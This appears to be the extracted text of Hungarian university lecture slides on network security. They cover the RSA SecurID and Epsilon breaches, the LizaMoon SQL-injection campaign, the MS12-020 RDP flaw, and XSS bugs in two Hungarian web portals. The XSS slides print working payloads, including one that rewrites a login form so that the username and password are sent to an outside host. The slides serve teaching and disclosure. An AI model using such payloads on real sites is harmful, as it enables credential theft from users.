Hálózatbiztonság a. Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan. Dr. Bencsáth Boldizsár



Hasonló dokumentumok
Using the CW-Net in a user defined IP network

Angol Középfokú Nyelvvizsgázók Bibliája: Nyelvtani összefoglalás, 30 kidolgozott szóbeli tétel, esszé és minta levelek + rendhagyó igék jelentéssel

Csatlakozás a BME eduroam hálózatához Setting up the BUTE eduroam network

ANGOL NYELVI SZINTFELMÉRŐ 2013 A CSOPORT. on of for from in by with up to at

Eladni könnyedén? Oracle Sales Cloud. Horváth Tünde Principal Sales Consultant március 23.

Intézményi IKI Gazdasági Nyelvi Vizsga

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY

Lopocsi Istvánné MINTA DOLGOZATOK FELTÉTELES MONDATOK. (1 st, 2 nd, 3 rd CONDITIONAL) + ANSWER KEY PRESENT PERFECT + ANSWER KEY

Phenotype. Genotype. It is like any other experiment! What is a bioinformatics experiment? Remember the Goal. Infectious Disease Paradigm

Tudományos Ismeretterjesztő Társulat

Proxer 7 Manager szoftver felhasználói leírás

JEROMOS A BARATOM PDF

Üzleti élet Nyitás. Nagyon hivatalos, a címzettnek meghatározott rangja van, aminek szerepelnie kell

Üzleti élet Nyitás. Nagyon hivatalos, a címzettnek meghatározott rangja van, aminek szerepelnie kell

Utasítások. Üzembe helyezés

(NGB_TA024_1) MÉRÉSI JEGYZŐKÖNYV

Business Opening. Very formal, recipient has a special title that must be used in place of their name

ENROLLMENT FORM / BEIRATKOZÁSI ADATLAP

Lexington Public Schools 146 Maple Street Lexington, Massachusetts 02420

SOPHOS simple + secure. A dobozba rejtett biztonság UTM 9. Kókai Gábor - Sophos Advanced Engineer Balogh Viktor - Sophos Architect SOPHOS

1. Gyakorlat: Telepítés: Windows Server 2008 R2 Enterprise, Core, Windows 7

Tudományos Ismeretterjesztő Társulat

Minta ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA II. Minta VIZSGÁZTATÓI PÉLDÁNY

Budapest By Vince Kiado, Klösz György

STUDENT LOGBOOK. 1 week general practice course for the 6 th year medical students SEMMELWEIS EGYETEM. Name of the student:

Cloud computing. Cloud computing. Dr. Bakonyi Péter.

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY

T Á J É K O Z T A T Ó. A 1108INT számú nyomtatvány a webcímen a Letöltések Nyomtatványkitöltő programok fülön érhető el.

Correlation & Linear Regression in SPSS

Tavaszi Sporttábor / Spring Sports Camp május (péntek vasárnap) May 2016 (Friday Sunday)

Cashback 2015 Deposit Promotion teljes szabályzat

EN United in diversity EN A8-0206/419. Amendment

ANGOL MAGYAR PARBESZEDEK ES PDF

A modern e-learning lehetőségei a tűzoltók oktatásának fejlesztésében. Dicse Jenő üzletfejlesztési igazgató

USER MANUAL Guest user

++Buy( Kaspersky Anti- Virus 2014 top sites for computer software ]

ANGOL NYELVI SZINTFELMÉRŐ 2012 A CSOPORT. to into after of about on for in at from

Sebastián Sáez Senior Trade Economist INTERNATIONAL TRADE DEPARTMENT WORLD BANK

MAGYARORSZAG UJJAEPITESE ES PDF


Számlakezelés az ELO DocXtraktor modullal

Utazás Szállás. Szállás - Keresés. Szállás - Foglalás. Útbaigazítás kérése. ... kiadó szoba?... a room to rent? szállásfajta.

Cloud computing Dr. Bakonyi Péter.

Széchenyi István Egyetem

(Asking for permission) (-hatok/-hetek?; Szabad ni? Lehet ni?) Az engedélykérés kifejezésére a következő segédigéket használhatjuk: vagy vagy vagy

BKI13ATEX0030/1 EK-Típus Vizsgálati Tanúsítvány/ EC-Type Examination Certificate 1. kiegészítés / Amendment 1 MSZ EN :2014

Prémium WordPress havi jelentés

ANGOL NYELVI SZINTFELMÉRŐ 2014 A CSOPORT

XV1100K(C)/XV1100SK(C)

Prémium WordPress havi jelentés

EGY KIS ZŰRZAVAR. Lecke (Középhaladó 1. / 1.) SOMETIMES, SOMETIME VAGY SOME TIME?

OLYMPICS! SUMMER CAMP

1. feladat: Hallgasd meg az angol szöveget, legalább egyszer.

ANGOL NYELVI SZINTFELMÉRŐ 2008 A CSOPORT

mondat ami nélkül ne indulj el külföldre

11. Gyakorlat: Certificate Authority (CA), FTP site-ok

Mapping Sequencing Reads to a Reference Genome

3. MINTAFELADATSOR KÖZÉPSZINT. Az írásbeli vizsga időtartama: 30 perc. III. Hallott szöveg értése

Mr. Adam Smith Smith's Plastics 8 Crossfield Road Selly Oak Birmingham West Midlands B29 1WQ

HALLÁS UTÁNI SZÖVEGÉRTÉS 25. Beauty and the Beast Chapter Two Beauty s rose

Helló Magyarország, megérkeztünk! partneri ajánlat

Can/be able to. Using Can in Present, Past, and Future. A Can jelen, múlt és jövő idejű használata

Website review acci.hu

DANS és Narcis. Burmeister Erzsébet. HUNOR találkozó, Budapest március 13.

Minden amerikanisztika szakos vegye fel az az alábbi elıadásokat (a

SAJTÓKÖZLEMÉNY Budapest július 13.

TestLine - Angol teszt Minta feladatsor

Előszó.2. Starter exercises. 3. Exercises for kids.. 9. Our comic...17

Get Instant Access to ebook Modon PDF at Our Huge Library MODON PDF. ==> Download: MODON PDF

On The Number Of Slim Semimodular Lattices

FOSS4G-CEE Prágra, 2012 május. Márta Gergely Sándor Csaba

EXKLUZÍV AJÁNDÉKANYAGOD A Phrasal Verb hadsereg! 2. rész

Az egészségügyi munkaerő toborzása és megtartása Európában

Directors and Officers Liability Insurance Questionnaire Adatlap vezetõ tisztségviselõk és felügyelõbizottsági tagok felelõsségbiztosításához

ENROLLMENT FORM / BEIRATKOZÁSI ADATLAP

Utolsó frissítés / Last update: február Szerkesztő / Editor: Csatlós Árpádné

Laborgyakorlat: A Windows XP haladó telepítése

FAMILY STRUCTURES THROUGH THE LIFE CYCLE

TRENDnetVIEW Pro szoftvert. ŸGyors telepítési útmutató (1)

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Hypothesis Testing. Petra Petrovics.

bab.la Cümle Kalıpları: İş Sipariş İngilizce-Macarca

bab.la Cümle Kalıpları: İş Sipariş Macarca-İngilizce

10. Gyakorlat: Alkalmazások publikálása Remote Desktop Szervízen keresztül

discosnp demo - Peterlongo Pierre 1 DISCOSNP++: Live demo

A riport fordulónapja / Date of report december 31. / 31 December, 2017

Please stay here. Peter asked me to stay there. He asked me if I could do it then. Can you do it now?

Hogyan használja az OROS online pótalkatrész jegyzéket?

SQL/PSM kurzorok rész

Lesson 1 On the train

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet Factor Analysis

World IPv6 day experiences

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Correlation & Linear. Petra Petrovics.

Ellenőrző lista. 2. Hálózati útvonal beállítások, kapcsolatok, névfeloldások ellenőrzése: WebEC és BKPR URL-k kliensről történő ellenőrzése.

Az Open Data jogi háttere. Dr. Telek Eszter

Nemzetközi vállalat - a vállalati szoftvermegoldások egyik vezető szállítója

16F628A megszakítás kezelése

Expansion of Red Deer and afforestation in Hungary

Márkaépítés a YouTube-on

Learn how to get started with Dropbox: Take your stuff anywhere. Send large files. Keep your files safe. Work on files together. Welcome to Dropbox!

ELO Digital Office ERP integráció

Átírás:

Hálózatbiztonság a gyakorlatban BMEVIHIM327 Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan 2015. május 22. Budapest Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu

2012 MS12-020 RDP flaw RDP flaw allows unauthenticated users remotely to gain kernel level access in windows Workaround: network level authentication (only supported by Vista and up) Reported by Luigi Auriemma to ZDI 05/2011 Patch on March/2012 patch Tuesday PoC on 15/03/2012 PoC is a copy of the MAPP report strange http://aluigi.org/adv/ms12-020_leak.txt http://t.co/j16u3ei5 2

3

4

5

6

7

8

Attack on RSA RSA Says SecurID Hack Based On Phishing With Flash 0-Day Trailrunner7 writes "RSA confirmed on Friday that the attack that compromised the company's high-value SecurID product was essentially a small, targeted phishing campaign that included a payload of a malicious Flash object embedded in an Excel file. "The attacker in this case sent two different phishing emails over a twoday period. The two emails were sent to two small groups of employees; you wouldn t consider these users particularly high profile or high value targets. The email subject line read '2011 Recruitment Plan," Uri Rivner, head of new technologies in the identity protection division of RSA wrote in a post on the attack. The attacker first harvested access credentials from the compromised users (user, domain admin, and service accounts). They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high value targets, which included process experts and IT and Non-IT specific server administrators advanced persistent threat (APT) attack http://blogs.rsa.com/rivner/anatomy-of-an-attack/ 9

10

Lessons leaned Even big, security related companies can be hacked Their anti-virus did not recognize a modified old rootkit Hackers successfully maintained ingoing and outgoing traffic ( covert channel) for a long time 0-day exploits are hard to handle Social engineering always works It s scary how easy to get admin rights after compromising user system (in a big company) RSA did not disclose what did the attackers reach. Is the seed database compromised? What are the consequences? Are SecureID tokens useless? - in this case obscurity surely does not mean security, instead, they loose trust. 11

Epsilon cracked "It turns out that Kroger is only one of many customers affected by the breach at Epsilon, which sends over 40 billion emails annually and counts over 2,500 clients, including 7 of the Fortune 10, to build and host their customer databases. It has been confirmed that the customer names and email addresses, and in a few cases other pieces of information, were compromised at several major brands, a list which continues to grow..." Major Breach at World's Largest Permission Based Email Marketing Services Company Affects Wide Range of Major Brands - List Continues to Grow 12

Affected companies of Epsilon breach TiVo Marriott Rewards Ritz-Carlton Rewards US Bank JPMorgan Chase Capital One Citi McKinsey & Company New York & Company Brookstone Kroger Walgreens 13

Notification of affected users TiVo Service Announcement Dear TiVo Customer, Today we were informed by our email service provider that your email address was exposed due to unauthorized access of their system. Our email service provider deploys emails on our behalf to customers who have opted into email-based communications from us. We were advised by our email service provider that the information that was obtained was limited to first name and/or email addresses only. Your service and any other personally identifiable information were not at risk and remain secure. Please note, it is possible you may receive spam email messages as a result. We want to urge you to be cautious when opening links or attachments from unknown third parties. We regret this has taken place and apologize for any inconvenience this may have caused you. We take your privacy very seriously, and we will continue to work diligently to protect your personal information. If you have unsubscribed in the past, there is no need to unsubscribe again. Your preferences will remain in place. Sincerely, The TiVo Team 14

Epsilon Some may dismiss the type of data harvested as a minor threat, but having access to customer lists opens the opportunity for targeted phishing attacks to customers who expect communications from these brands. eing able to send a targeted phishing message to a bank customer and personally address them by name will certainly result in a much higher hit rate than a typical blind spamming campaign would yield. 15

SQL injection based worm Hundreds of thousands of URLs have been affected by a massive SQLinjection attack, according to security specialist Websense. LizaMoon Affected sites are easy to spot by searching for the line of JavaScript that the attack inserts into a page, which links to a site called Liza Moon. Several itunes URLs have been compromised with the injected code, according to Websense though as Apple's system doesn't execute the code, users are presumed safe. A scareware file is installed on the site in the process, which then beguiles the user into believing that the computer is infected with viruses by displaying a fake Trojan alert. The malicious file then sells a software to the unsuspecting customer which offers to fix the malady. Besides the money spent on the bogus scareware, the multi-stage attack compromises the system security. 16

17

??? 18

Lessons learned SQL injection is easy to and You have to protect against it If something remains unpatched for a long time, someone will crack it If it is a mass problem, sooner or later worms, Internet-wide scans will happen 19

Hint: You cannot manage browser plugins security updates A great tool is available The Qualys BrowserCheck plug-in works across multiple browsers including Internet Explorer, Firefox, Chrome and Opera, on multiple operating systems. Install the plugin, restart the browser, click the blue Scan Now button, and the results should let you know if there are any security or stability updates available for your installed plug-ins (a list of the plug-ins and add-ons that this program can check is available here). 20

21

22

XSS vulnerability found by Acunetix scanner 23

Ha az egeret a user részre visszük, 24

Nexon XSS: Have a look inside <!-- Üres sor (hogy a bejelentkezés képrészletbe ne írjunk bele) --> <tr> <td height="60" colspan="4"> </td> </tr> <!-- Felhasználói név --> <tr> <td width="310"></td> <td class="subtitle" width="85" align="right">felhasználó: </td> <td width="149"> <input type="text" name="vstrusername" id="vstrusername" style="width: 80%" size="20" value="" onmouseover=prompt(938492) bad=""> </td> <td width="30"> </td> </tr> 25

Neptun XSS found by Acunetix scanner 26

Details. http://neptun.bme.huzz/?res=aa%22 -> <form name="login" method="post" action="include/setcookie.php?res=aa""> http://10.105.1.48/neptun/?res=%22%20onsubmit=%22%2 0im=new%20Image;%20im.src=%27http://www.crysys.hu/n eptun/%27%2bdocument.forms[0].uname.value%2b%27:% 27%2bdocument.forms[0].passwd.value Results in: method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src='http://www.crysys.hu/neptun/'+document.forms[0].u name.value+':'+document.forms[0].passwd.value"> 27

28

29

Kérdések? KÖSZÖNÖM A FIGYELMET! Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu 30